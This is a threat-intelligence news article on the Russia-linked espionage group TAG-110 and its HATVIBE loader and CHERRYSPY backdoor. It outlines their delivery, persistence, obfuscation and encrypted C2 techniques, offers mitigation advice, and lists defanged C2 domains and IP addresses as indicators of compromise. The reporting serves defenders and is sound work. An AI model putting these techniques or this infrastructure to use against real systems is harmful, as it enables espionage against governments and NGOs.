TAG-110, a menace group linked with Russia, is currently engaged in cyber-espionage operations targeting organizations in Central Asia, East Asia, and Europe.
The primary focuses of this group include governmental bodies, NGOs, and academic establishments by deploying tailor-made malicious software such as HATVIBE and CHERRYSPY.
Furthermore, TAG-110’s undertakings likely serve as a component of a broader Russian scheme to assert influence in nations that were once part of the Soviet Union and gather intelligence on global political developments.
As per the findings from Recorded Future’s Insikt Group, in July 2024, a total of 62 victims have been documented across 11 countries, with significant incidents in Kyrgyzstan, Uzbekistan, and Kazakhstan.
Insight Into The TAG-110 Threat Group
TAG-110 operates as a threat group that bears resemblances to the publicly identified entity UAC-0063, which CERT-UA has attributed to BlueDelta (APT28) with a “moderate level of confidence.” Commencing at least in 2021, TAG-110 has been conducting intelligence operations in alignment with Russia’s geopolitical interests.
Historical reports suggest that TAG-110 primarily aims at entities within Central Asia, with additional targets located in Israel, Ukraine, and Mongolia.
Using custom-made malware like HATVIBE and CHERRYSPY, TAG-110 targets individuals, with researchers noting the group’s resemblance to UAC-0063 and its association with the Russian APT group BlueDelta (APT28) with moderate certainty.
HATVIBE
Since April 2023, TAG-110 has been leveraging HATVIBE, an individualized HTML Application (HTA) loader. The primary function of HATVIBE is to execute additional malware, including the CHERRYSPY backdoor.
This malware is disseminated through malicious email attachments or by exploiting web-facing vulnerabilities such as CVE-2024-23692.
Employing the mshta.exe utility enables scheduled operations, ensuring persistence. HATVIBE uses obfuscation techniques like XOR encryption and VBScript encoding.
Post-deployment, it utilizes HTTP PUT requests to connect with command-and-control (C2) servers, extracting crucial system details.
CHERRYSPY
Since April 2023, TAG-110 has been utilizing the customized Python backdoor CHERRYSPY for espionage activities.
It has been identified that HATVIBE downloads CHERRYSPY, launching it through a Python interpreter. Encrypted communication with C2 servers is enabled by robust techniques such as RSA and Advanced Encryption Standard (AES).
Primarily targeting governmental and research institutions, TAG-110 deploys CHERRYSPY to monitor victims’ systems and extract confidential data.
- To locate malicious domains and IPs linked with TAG-110, deploy network protection tools, intrusion detection systems, and intrusion prevention systems.
- Utilize Snort, Suricata, and YARA regulations to identify activities associated with HATVIBE and CHERRYSPY.
- To prevent exploitation of documented vulnerabilities like CVE-2024-23692, ensure prompt software updates.
- Educate staff on recognizing phishing attempts and implement multi-factor authentication measures.
Signs of Compromise
C2 Domains:
enrollmentdm[.]com
errorreporting[.]net
experience-improvement[.]com
game-wins[.]com
internalsecurity[.]us
lanmangraphics[.]com
retaildemo[.]info
shared-rss[.]info
telemetry-network[.]com
tieringservice[.]com
trust-certificate[.]net
C2 IP Addresses:
5.45.70[.]178
45.136.198[.]18
45.136.198[.]184
45.136.198[.]189
46.183.219[.]228
84.32.188[.]23
185.62.56[.]47
185.158.248[.]198
185.167.63[.]42
194.31.55[.]131
212.224.86[.]69
The article ‘Russian TAG-110 Attacking Users With HATVIBE And CHERRYSPY Hacking Tools’ was originally seen on Cyber Security News.